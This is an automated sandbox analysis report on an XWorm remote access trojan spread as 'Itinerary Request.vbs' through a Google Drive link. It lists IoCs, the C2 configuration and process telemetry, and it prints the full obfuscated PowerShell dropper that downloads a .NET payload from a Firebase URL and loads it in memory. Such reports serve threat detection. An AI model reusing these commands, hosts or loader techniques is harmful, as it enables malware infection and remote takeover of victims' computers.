xworm | hxxps://drive[.]google[.]com/file/d/1ujWZUijtSNleX-CVAmIFu_mP1gIYi4My/view?usp=drive_web

Analysis

max time kernel
112s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20240730-ja
resource tags

arch:x64arch:x86image:win10v2004-20240730-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
01/08/2024, 01:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/1ujWZUijtSNleX-CVAmIFu_mP1gIYi4My/view?usp=drive_web

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

Extracted

Family

xworm

Version

5.0

BobbyMiller09.bumbleshrimp.com:1978

Mutex

nVTUMK4KGE9DKP3U

Attributes

Install_directory
%Temp%
install_file
XClient.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/2180-186-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
99	2440	powershell.exe
100	4192	powershell.exe
110	980	powershell.exe
111	3696	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	RegSvcs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	RegSvcs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_______________________-------------.lnk	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2432	powershell.exe
4192	powershell.exe
3136	powershell.exe
980	powershell.exe
2968	powershell.exe
3696	powershell.exe
3548	powershell.exe
2440	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	drive.google.com
6	drive.google.com

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2440 set thread context of 2180	2440	powershell.exe	116
PID 4192 set thread context of 4552	4192	powershell.exe	123
PID 980 set thread context of 1700	980	powershell.exe	129
PID 3696 set thread context of 1308	3696	powershell.exe	135

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-195445723-368091294-1661186673-1000_Classes\Local Settings	msedge.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\未確認 162207.crdownload:SmartScreen	msedge.exe
File created	C:\Users\Admin\AppData\Local\Temp\Itinerary Request.vbs\:SmartScreen:$DATA	powershell.exe
File created	C:\Users\Admin\AppData\Local\Temp\Itinerary Request.vbs\:SmartScreen:$DATA	powershell.exe
File created	C:\Users\Admin\AppData\Local\Temp\Itinerary Request.vbs\:SmartScreen:$DATA	powershell.exe
File created	C:\Users\Admin\AppData\Local\Temp\Itinerary Request.vbs\:SmartScreen:$DATA	powershell.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
4340	msedge.exe
4340	msedge.exe
2580	msedge.exe
2580	msedge.exe
400	identity_helper.exe
400	identity_helper.exe
4404	msedge.exe
4404	msedge.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
2440	powershell.exe
2440	powershell.exe
2440	powershell.exe
2440	powershell.exe
1792	powershell.exe
1792	powershell.exe
1792	powershell.exe
2432	powershell.exe
2432	powershell.exe
2432	powershell.exe
4192	powershell.exe
4192	powershell.exe
4192	powershell.exe
4192	powershell.exe
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
3136	powershell.exe
3136	powershell.exe
3136	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
980	powershell.exe
1936	powershell.exe
1936	powershell.exe
1936	powershell.exe
2968	powershell.exe
2968	powershell.exe
2968	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
2348	powershell.exe
2348	powershell.exe
2348	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeDebugPrivilege	3548	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	2180	RegSvcs.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	4192	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	4552	RegSvcs.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	980	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	1700	RegSvcs.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	1308	RegSvcs.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe
2580	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2580 wrote to memory of 4960	2580	msedge.exe	83
PID 2580 wrote to memory of 4960	2580	msedge.exe	83
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 3928	2580	msedge.exe	84
PID 2580 wrote to memory of 4340	2580	msedge.exe	85
PID 2580 wrote to memory of 4340	2580	msedge.exe	85
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86
PID 2580 wrote to memory of 3248	2580	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/file/d/1ujWZUijtSNleX-CVAmIFu_mP1gIYi4My/view?usp=drive_web
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc00a46f8,0x7ffcc00a4708,0x7ffcc00a4718
  2⤵
  PID:4960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
  2⤵
  PID:3928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
  2⤵
  PID:3248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:1300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:3816
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  PID:1644
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:2208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:5080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5016 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:2692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --service-sandbox-type=collections --mojo-platform-channel-handle=5480 /prefetch:8
  2⤵
  PID:392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,2813355633205973018,8167023869613304558,131072 --lang=ja --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4404
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Itinerary Request.vbs"
  2⤵
  - Checks computer location settings
  PID:4936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bj▒GU▒dgBy▒Gc▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Bo▒GI▒bwB2▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒B1▒Hg▒YgBm▒GU▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒ZgBp▒HI▒ZQBi▒GE▒cwBl▒HM▒d▒Bv▒HI▒YQBn▒GU▒LgBn▒G8▒bwBn▒Gw▒ZQBh▒H▒▒aQBz▒C4▒YwBv▒G0▒LwB2▒D▒▒LwBi▒C8▒cgBv▒GQ▒cgBp▒GE▒awBk▒C0▒O▒▒0▒DE▒MwBk▒C4▒YQBw▒H▒▒cwBw▒G8▒d▒▒u▒GM▒bwBt▒C8▒bw▒v▒GQ▒b▒Bs▒CU▒MgBG▒GQ▒b▒Bs▒CU▒Mg▒w▒Eg▒bwBw▒GU▒LgB0▒Hg▒d▒▒/▒GE▒b▒B0▒D0▒bQBl▒GQ▒aQBh▒CY▒d▒Bv▒Gs▒ZQBu▒D0▒Ng▒x▒GM▒O▒▒y▒Dk▒Zg▒2▒C0▒ZQ▒x▒Dk▒Ng▒t▒DQ▒OQBl▒Dg▒LQBi▒DQ▒ZgBm▒C0▒M▒▒0▒DE▒MQ▒z▒DQ▒NQ▒3▒Dc▒ZgBm▒GU▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒e▒Bi▒GY▒ZQ▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒Zg▒w▒DE▒NwBk▒Dg▒Ng▒5▒Dk▒MQ▒x▒GQ▒LQ▒2▒D▒▒ZQ▒5▒C0▒N▒Bj▒Dk▒N▒▒t▒DM▒YgBm▒DU▒LQ▒2▒GU▒Nw▒4▒GI▒OQ▒0▒DE▒PQBu▒GU▒awBv▒HQ▒JgBh▒Gk▒Z▒Bl▒G0▒PQB0▒Gw▒YQ▒/▒HQ▒e▒B0▒C4▒awBu▒Gk▒b▒B5▒GQ▒Z▒B1▒GI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gg▒YgBv▒HY▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒YwBl▒HY▒cgBn▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Itinerary Request.vbs');powershell -command $KByHL;
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$cevrg = '034';$hbovx = 'C:\Users\Admin\Downloads\Itinerary Request.vbs';[Byte[]] $uxbfe = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uxbfe).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('f017d869911d-60e9-4c94-3bf5-6e78b941=nekot&aidem=tla?txt.knilyddub/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $hbovx , '_______________________-------------', $cevrg, '1', 'Roda' ));"
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2440
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\Downloads\Itinerary Request.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1792
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        5⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2180

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:184

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4616

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4480

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Itinerary Request.vbs"
1⤵
- Checks computer location settings
PID:3720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
